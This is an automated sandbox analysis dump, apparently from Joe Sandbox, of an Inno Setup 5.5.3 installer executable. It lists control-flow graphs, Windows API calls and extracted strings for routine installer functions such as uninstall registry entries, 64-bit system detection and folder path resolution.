                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: NtdllProc_Window
                                                                                                      • String ID:
                                                                                                      • API String ID: 4255912815-0
                                                                                                      • Opcode ID: 9e43cbcd657a147b44e82c26281af1c584f356d37a2e763e4ec43db1fd6d4cd6
                                                                                                      • Instruction ID: 7ca9c19e24a5def9c493c34941f9da96f9ca037215ec7a65a90973bf7a04e639
                                                                                                      • Opcode Fuzzy Hash: 9e43cbcd657a147b44e82c26281af1c584f356d37a2e763e4ec43db1fd6d4cd6
                                                                                                      • Instruction Fuzzy Hash: FCD09E7120011D7B9B00DE99E840D6B33AD9B88710B909925F945D7642D634ED9197A5

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 844 46f058-46f08a 845 46f0a7 844->845 846 46f08c-46f093 844->846 849 46f0ae-46f0e6 call 403634 call 403738 call 42dec0 845->849 847 46f095-46f09c 846->847 848 46f09e-46f0a5 846->848 847->845 847->848 848->849 856 46f101-46f12a call 403738 call 42dde4 849->856 857 46f0e8-46f0fc call 403738 call 42dec0 849->857 865 46f12c-46f135 call 46ed28 856->865 866 46f13a-46f163 call 46ee44 856->866 857->856 865->866 870 46f175-46f178 call 403400 866->870 871 46f165-46f173 call 403494 866->871 875 46f17d-46f1c8 call 46ee44 call 42c3fc call 46ee8c call 46ee44 870->875 871->875 884 46f1de-46f1ff call 45559c call 46ee44 875->884 885 46f1ca-46f1dd call 46eeb4 875->885 892 46f255-46f25c 884->892 893 46f201-46f254 call 46ee44 call 431404 call 46ee44 call 431404 call 46ee44 884->893 885->884 894 46f25e-46f29b call 431404 call 46ee44 call 431404 call 46ee44 892->894 895 46f29c-46f2a3 892->895 893->892 894->895 899 46f2e4-46f309 call 40b24c call 46ee44 895->899 900 46f2a5-46f2e3 call 46ee44 * 3 895->900 919 46f30b-46f316 call 47c26c 899->919 920 46f318-46f321 call 403494 899->920 900->899 929 46f326-46f331 call 478e04 919->929 920->929 934 46f333-46f338 929->934 935 46f33a 929->935 936 46f33f-46f509 call 403778 call 46ee44 call 47c26c call 46ee8c call 403494 call 40357c * 2 call 46ee44 call 403494 call 40357c * 2 call 46ee44 call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c 934->936 935->936 999 46f51f-46f52d call 46eeb4 936->999 1000 46f50b-46f51d call 46ee44 936->1000 1004 46f532 999->1004 1005 46f533-46f57c call 46eeb4 call 46eee8 call 46ee44 call 47c26c call 46ef4c 1000->1005 1004->1005 1016 46f5a2-46f5af 1005->1016 1017 46f57e-46f5a1 call 46eeb4 * 2 1005->1017 1019 46f5b5-46f5bc 1016->1019 1020 46f67e-46f685 1016->1020 1017->1016 1024 46f5be-46f5c5 1019->1024 1025 46f629-46f638 1019->1025 1021 46f687-46f6bd call 494cec 1020->1021 1022 46f6df-46f6f5 RegCloseKey 1020->1022 1021->1022 1024->1025 1029 46f5c7-46f5eb call 430bcc 1024->1029 1028 46f63b-46f648 1025->1028 1032 46f65f-46f678 call 430c08 call 46eeb4 1028->1032 1033 46f64a-46f657 1028->1033 1029->1028 1039 46f5ed-46f5ee 1029->1039 1042 46f67d 1032->1042 1033->1032 1035 46f659-46f65d 1033->1035 1035->1020 1035->1032 1041 46f5f0-46f616 call 40b24c call 479630 1039->1041 1047 46f623-46f625 1041->1047 1048 46f618-46f61e call 430bcc 1041->1048 1042->1020 1047->1041 1050 46f627 1047->1050 1048->1047 1050->1028
                                                                                                      APIs
                                                                                                        • Part of subcall function 0046EE44: RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,0047620E,?,0049C1E0,?,0046F15B,?,00000000,0046F6F6,?,_is1), ref: 0046EE67
                                                                                                        • Part of subcall function 0046EEB4: RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F532,?,?,00000000,0046F6F6,?,_is1,?), ref: 0046EEC7
                                                                                                      • RegCloseKey.ADVAPI32(?,0046F6FD,?,_is1,?,Software\Microsoft\Windows\CurrentVersion\Uninstall\,00000000,0046F748,?,?,0049C1E0,00000000), ref: 0046F6F0
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Value$Close
                                                                                                      • String ID: " /SILENT$5.5.3 (a)$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$EstimatedSize$HelpLink$HelpTelephone$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: Language$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: Setup Version$Inno Setup: User$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$InstallDate$InstallLocation$MajorVersion$MinorVersion$ModifyPath$NoModify$NoRepair$Publisher$QuietUninstallString$Readme$RegisterPreviousData$Software\Microsoft\Windows\CurrentVersion\Uninstall\$URLInfoAbout$URLUpdateInfo$UninstallString$_is1
                                                                                                      • API String ID: 3391052094-3342197833
                                                                                                      • Opcode ID: 41e5a022c9dfc144d242315d0234d20c9f1df57cded100a3ade253d049a3cf6c
                                                                                                      • Instruction ID: 0d1426ff9ce9a688a4d167ea33859b9e50b28094dc6fe7db73e07d6bdcf854ec
                                                                                                      • Opcode Fuzzy Hash: 41e5a022c9dfc144d242315d0234d20c9f1df57cded100a3ade253d049a3cf6c
                                                                                                      • Instruction Fuzzy Hash: D1125935A001089BDB04EF95E881ADE73F5EB48304F24817BE8506B366EB79AD45CF5E

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1051 492848-49287c call 403684 1054 49287e-49288d call 446f9c Sleep 1051->1054 1055 492892-49289f call 403684 1051->1055 1060 492d22-492d3c call 403420 1054->1060 1061 4928ce-4928db call 403684 1055->1061 1062 4928a1-4928c4 call 446ff8 call 403738 FindWindowA call 447278 1055->1062 1070 49290a-492917 call 403684 1061->1070 1071 4928dd-492905 call 446ff8 call 403738 FindWindowA call 447278 1061->1071 1080 4928c9 1062->1080 1078 492919-49295b call 446f9c * 4 SendMessageA call 447278 1070->1078 1079 492960-49296d call 403684 1070->1079 1071->1060 1078->1060 1090 4929bc-4929c9 call 403684 1079->1090 1091 49296f-4929b7 call 446f9c * 4 PostMessageA call 4470d0 1079->1091 1080->1060 1100 492a18-492a25 call 403684 1090->1100 1101 4929cb-492a13 call 446f9c * 4 SendNotifyMessageA call 4470d0 1090->1101 1091->1060 1113 492a52-492a5f call 403684 1100->1113 1114 492a27-492a4d call 446ff8 call 403738 RegisterClipboardFormatA call 447278 1100->1114 1101->1060 1125 492a61-492a9b call 446f9c * 3 SendMessageA call 447278 1113->1125 1126 492aa0-492aad call 403684 1113->1126 1114->1060 1125->1060 1138 492aaf-492aef call 446f9c * 3 PostMessageA call 4470d0 1126->1138 1139 492af4-492b01 call 403684 1126->1139 1138->1060 1152 492b48-492b55 call 403684 1139->1152 1153 492b03-492b43 call 446f9c * 3 SendNotifyMessageA call 4470d0 1139->1153 1164 492baa-492bb7 call 403684 1152->1164 1165 492b57-492b75 call 446ff8 call 42e394 1152->1165 1153->1060 1175 492bb9-492be5 call 446ff8 call 403738 call 446f9c GetProcAddress 1164->1175 1176 492c31-492c3e call 403684 1164->1176 1185 492b87-492b95 GetLastError call 447278 1165->1185 1186 492b77-492b85 call 447278 1165->1186 1206 492c21-492c2c call 4470d0 1175->1206 1207 492be7-492c1c call 446f9c * 2 call 447278 call 4470d0 1175->1207 1187 492c40-492c61 call 446f9c FreeLibrary call 4470d0 1176->1187 1188 492c66-492c73 call 403684 1176->1188 1194 492b9a-492ba5 call 447278 1185->1194 1186->1194 1187->1060 1203 492c98-492ca5 call 403684 1188->1203 1204 492c75-492c93 call 446ff8 call 403738 CreateMutexA 1188->1204 1194->1060 1215 492cdb-492ce8 call 403684 1203->1215 1216 492ca7-492cd9 call 48ccc8 call 403574 call 403738 OemToCharBuffA call 48cce0 1203->1216 1204->1060 1206->1060 1207->1060 1228 492cea-492d1c call 48ccc8 call 403574 call 403738 CharToOemBuffA call 48cce0 1215->1228 1229 492d1e 1215->1229 1216->1060 1228->1060 1229->1060
                                                                                                      APIs
                                                                                                      • Sleep.KERNEL32(00000000,00000000,00492D3D,?,?,?,?,00000000,00000000,00000000), ref: 00492888
                                                                                                      • FindWindowA.USER32(00000000,00000000), ref: 004928B9
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FindSleepWindow
                                                                                                      • String ID: CALLDLLPROC$CHARTOOEMBUFF$CREATEMUTEX$FINDWINDOWBYCLASSNAME$FINDWINDOWBYWINDOWNAME$FREEDLL$LOADDLL$OEMTOCHARBUFF$POSTBROADCASTMESSAGE$POSTMESSAGE$REGISTERWINDOWMESSAGE$SENDBROADCASTMESSAGE$SENDBROADCASTNOTIFYMESSAGE$SENDMESSAGE$SENDNOTIFYMESSAGE$SLEEP
                                                                                                      • API String ID: 3078808852-3310373309
                                                                                                      • Opcode ID: 543bbb3fa16e1ad260fa6bca8d7f7bf65573201bf2c1e3a3e9abb38e798cd817
                                                                                                      • Instruction ID: 092cd3663c6e49ee7eb77a287a3c2ed341282e51176ce6ebc4a466309821376d
                                                                                                      • Opcode Fuzzy Hash: 543bbb3fa16e1ad260fa6bca8d7f7bf65573201bf2c1e3a3e9abb38e798cd817
                                                                                                      • Instruction Fuzzy Hash: D9C182A0B042003BDB14BF3E9D4551F59A99F95708B119A3FB446EB78BCE7CEC0A4359

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1621 483a7c-483aa1 GetModuleHandleA GetProcAddress 1622 483b08-483b0d GetSystemInfo 1621->1622 1623 483aa3-483ab9 GetNativeSystemInfo GetProcAddress 1621->1623 1624 483b12-483b1b 1622->1624 1623->1624 1625 483abb-483ac6 GetCurrentProcess 1623->1625 1626 483b2b-483b32 1624->1626 1627 483b1d-483b21 1624->1627 1625->1624 1632 483ac8-483acc 1625->1632 1630 483b4d-483b52 1626->1630 1628 483b23-483b27 1627->1628 1629 483b34-483b3b 1627->1629 1633 483b29-483b46 1628->1633 1634 483b3d-483b44 1628->1634 1629->1630 1632->1624 1635 483ace-483ad5 call 45271c 1632->1635 1633->1630 1634->1630 1635->1624 1639 483ad7-483ae4 GetProcAddress 1635->1639 1639->1624 1640 483ae6-483afd GetModuleHandleA GetProcAddress 1639->1640 1640->1624 1641 483aff-483b06 1640->1641 1641->1624
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00483A8D
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00483A9A
                                                                                                      • GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483AA8
                                                                                                      • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00483AB0
                                                                                                      • GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00483ABC
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00483ADD
                                                                                                      • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00483AF0
                                                                                                      • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 00483AF6
                                                                                                      • GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483B0D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$HandleInfoModuleSystem$CurrentNativeProcess
                                                                                                      • String ID: GetNativeSystemInfo$GetSystemWow64DirectoryA$IsWow64Process$RegDeleteKeyExA$advapi32.dll$kernel32.dll
                                                                                                      • API String ID: 2230631259-2623177817
                                                                                                      • Opcode ID: 7dca9948a1095c4364ab55fa8ed369d502b26d1142efbcbd424e95be4cda74f5
                                                                                                      • Instruction ID: d1db678d6bd555fecb25ccca0b477ef677e73c145b16f55f8d8b06b946339d0c
                                                                                                      • Opcode Fuzzy Hash: 7dca9948a1095c4364ab55fa8ed369d502b26d1142efbcbd424e95be4cda74f5
                                                                                                      • Instruction Fuzzy Hash: 7F1181C0204741A4DA00BFB94D45B6F65889B11F2AF040C7B6840AA287EABCEF44A76E

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1647 468d88-468dc0 call 47c26c 1650 468dc6-468dd6 call 478e24 1647->1650 1651 468fa2-468fbc call 403420 1647->1651 1656 468ddb-468e20 call 4078f4 call 403738 call 42de1c 1650->1656 1662 468e25-468e27 1656->1662 1663 468e2d-468e42 1662->1663 1664 468f98-468f9c 1662->1664 1665 468e57-468e5e 1663->1665 1666 468e44-468e52 call 42dd4c 1663->1666 1664->1651 1664->1656 1668 468e60-468e82 call 42dd4c call 42dd64 1665->1668 1669 468e8b-468e92 1665->1669 1666->1665 1668->1669 1686 468e84 1668->1686 1670 468e94-468eb9 call 42dd4c * 2 1669->1670 1671 468eeb-468ef2 1669->1671 1693 468ebb-468ec4 call 4314f8 1670->1693 1694 468ec9-468edb call 42dd4c 1670->1694 1673 468ef4-468f06 call 42dd4c 1671->1673 1674 468f38-468f3f 1671->1674 1687 468f16-468f28 call 42dd4c 1673->1687 1688 468f08-468f11 call 4314f8 1673->1688 1680 468f41-468f75 call 42dd4c * 3 1674->1680 1681 468f7a-468f90 RegCloseKey 1674->1681 1680->1681 1686->1669 1687->1674 1701 468f2a-468f33 call 4314f8 1687->1701 1688->1687 1693->1694 1694->1671 1704 468edd-468ee6 call 4314f8 1694->1704 1701->1674 1704->1671
                                                                                                      APIs
                                                                                                        • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                      • RegCloseKey.ADVAPI32(?,00468FA2,?,?,00000001,00000000,00000000,00468FBD,?,00000000,00000000,?), ref: 00468F8B
                                                                                                      Strings
                                                                                                      • Inno Setup: Selected Tasks, xrefs: 00468EF7
                                                                                                      • Inno Setup: User Info: Name, xrefs: 00468F47
                                                                                                      • Inno Setup: User Info: Serial, xrefs: 00468F6D
                                                                                                      • Inno Setup: Setup Type, xrefs: 00468E9A
                                                                                                      • Inno Setup: Selected Components, xrefs: 00468EAA
                                                                                                      • Inno Setup: User Info: Organization, xrefs: 00468F5A
                                                                                                      • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00468DE7
                                                                                                      • Inno Setup: Deselected Components, xrefs: 00468ECC
                                                                                                      • %s\%s_is1, xrefs: 00468E05
                                                                                                      • Inno Setup: App Path, xrefs: 00468E4A
                                                                                                      • Inno Setup: Icon Group, xrefs: 00468E66
                                                                                                      • Inno Setup: No Icons, xrefs: 00468E73
                                                                                                      • Inno Setup: Deselected Tasks, xrefs: 00468F19
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseOpen
                                                                                                      • String ID: %s\%s_is1$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                                      • API String ID: 47109696-1093091907
                                                                                                      • Opcode ID: b9928a5b5c0cf6c1dc91f6627cbb06318d05b30c5d76f15ccadbaf9fdfcb7506
                                                                                                      • Instruction ID: 069c4cdb4b1287edb5c1b702bebeb6c44c7684ad2aa17a57d1fdfe9a2539746b
                                                                                                      • Opcode Fuzzy Hash: b9928a5b5c0cf6c1dc91f6627cbb06318d05b30c5d76f15ccadbaf9fdfcb7506
                                                                                                      • Instruction Fuzzy Hash: 6B51A330A006449BCB15DB65D881BDEB7F5EB48304F50857EE840AB391EB79AF01CB59

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                        • Part of subcall function 0042D898: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00453DB4,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5), ref: 0042D8AB
                                                                                                        • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                                        • Part of subcall function 0042D8F0: GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453B5A,00000000,00453BFD,?,?,00000000,00000000,00000000,00000000,00000000,?,00453FED,00000000), ref: 0042D90A
                                                                                                        • Part of subcall function 0042D8F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D910
                                                                                                      • SHGetKnownFolderPath.SHELL32(00499D30,00008000,00000000,?,00000000,0047C942), ref: 0047C846
                                                                                                      • CoTaskMemFree.OLE32(?,0047C88B), ref: 0047C87E
                                                                                                        • Part of subcall function 0042D208: GetEnvironmentVariableA.KERNEL32(00000000,00000000,00000000,?,?,00000000,0042DA3E,00000000,0042DAD0,?,?,?,0049B628,00000000,00000000), ref: 0042D233
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Directory$AddressEnvironmentFolderFreeHandleKnownModulePathProcSystemTaskVariableWindows
                                                                                                      • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                                                                      • API String ID: 3771764029-544719455
                                                                                                      • Opcode ID: 23963da8b4b34a95ffd58041a931adf40c150fbdd8371ea61f0364dbdea36cdf
                                                                                                      • Instruction ID: 88e29a10730232d74bbdb0c5b7d00c3ea12cf2700f44d19641833b453bfd909d
                                                                                                      • Opcode Fuzzy Hash: 23963da8b4b34a95ffd58041a931adf40c150fbdd8371ea61f0364dbdea36cdf
                                                                                                      • Instruction Fuzzy Hash: 1461CF74A00204AFDB10EBA5D8C2A9E7B69EB44319F90C47FE404A7392DB3C9A44CF5D

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1949 423874-42387e 1950 4239a7-4239ab 1949->1950 1951 423884-4238a6 call 41f3c4 GetClassInfoA 1949->1951 1954 4238d7-4238e0 GetSystemMetrics 1951->1954 1955 4238a8-4238bf RegisterClassA 1951->1955 1957 4238e2 1954->1957 1958 4238e5-4238ef GetSystemMetrics 1954->1958 1955->1954 1956 4238c1-4238d2 call 408cbc call 40311c 1955->1956 1956->1954 1957->1958 1960 4238f1 1958->1960 1961 4238f4-423950 call 403738 call 4062e8 call 403400 call 42364c SetWindowLongA 1958->1961 1960->1961 1972 423952-423965 call 424178 SendMessageA 1961->1972 1973 42396a-423998 GetSystemMenu DeleteMenu * 2 1961->1973 1972->1973 1973->1950 1975 42399a-4239a2 DeleteMenu 1973->1975 1975->1950
                                                                                                      APIs
                                                                                                        • Part of subcall function 0041F3C4: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDA4,?,0042388F,00423C0C,0041EDA4), ref: 0041F3E2
                                                                                                      • GetClassInfoA.USER32(00400000,0042367C), ref: 0042389F
                                                                                                      • RegisterClassA.USER32(00499630), ref: 004238B7
                                                                                                      • GetSystemMetrics.USER32(00000000), ref: 004238D9
                                                                                                      • GetSystemMetrics.USER32(00000001), ref: 004238E8
                                                                                                      • SetWindowLongA.USER32(00410460,000000FC,0042368C), ref: 00423944
                                                                                                      • SendMessageA.USER32(00410460,00000080,00000001,00000000), ref: 00423965
                                                                                                      • GetSystemMenu.USER32(00410460,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C,0041EDA4), ref: 00423970
                                                                                                      • DeleteMenu.USER32(00000000,0000F030,00000000,00410460,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C,0041EDA4), ref: 0042397F
                                                                                                      • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,00410460,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001), ref: 0042398C
                                                                                                      • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,00410460,00000000,00000000,00400000,00000000,00000000,00000000), ref: 004239A2
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Menu$DeleteSystem$ClassMetrics$AllocInfoLongMessageRegisterSendVirtualWindow
                                                                                                      • String ID: |6B
                                                                                                      • API String ID: 183575631-3009739247
                                                                                                      • Opcode ID: 4cae07da4ecbd82a5ef2c5022e230c145e19d211ee6ce0cd027d67cd6f27acc7
                                                                                                      • Instruction ID: 5979ac727d64f3fe5c9a0a43452729076f54e0f9e4c251b9a4c28f9d6bed272f
                                                                                                      • Opcode Fuzzy Hash: 4cae07da4ecbd82a5ef2c5022e230c145e19d211ee6ce0cd027d67cd6f27acc7
                                                                                                      • Instruction Fuzzy Hash: E63152B17402006AEB10AF69DC82F6A37989B14709F60017BFA44EF2D7C6BDED40876D

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1977 47ce78-47cece call 42c3fc call 4035c0 call 47cb3c call 4525d8 1986 47ced0-47ced5 call 453344 1977->1986 1987 47ceda-47cee9 call 4525d8 1977->1987 1986->1987 1991 47cf03-47cf09 1987->1991 1992 47ceeb-47cef1 1987->1992 1995 47cf20-47cf48 call 42e394 * 2 1991->1995 1996 47cf0b-47cf11 1991->1996 1993 47cf13-47cf1b call 403494 1992->1993 1994 47cef3-47cef9 1992->1994 1993->1995 1994->1991 1997 47cefb-47cf01 1994->1997 2003 47cf6f-47cf89 GetProcAddress 1995->2003 2004 47cf4a-47cf6a call 4078f4 call 453344 1995->2004 1996->1993 1996->1995 1997->1991 1997->1993 2006 47cf95-47cfb2 call 403400 * 2 2003->2006 2007 47cf8b-47cf90 call 453344 2003->2007 2004->2003 2007->2006
                                                                                                      APIs
                                                                                                      • GetProcAddress.KERNEL32(740E0000,SHGetFolderPathA), ref: 0047CF7A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc
                                                                                                      • String ID: Failed to get address of SHGetFolderPath function$Failed to get version numbers of _shfoldr.dll$Failed to load DLL "%s"$SHFOLDERDLL$SHGetFolderPathA$]xI$_isetup\_shfoldr.dll$shell32.dll$shfolder.dll
                                                                                                      • API String ID: 190572456-256906917
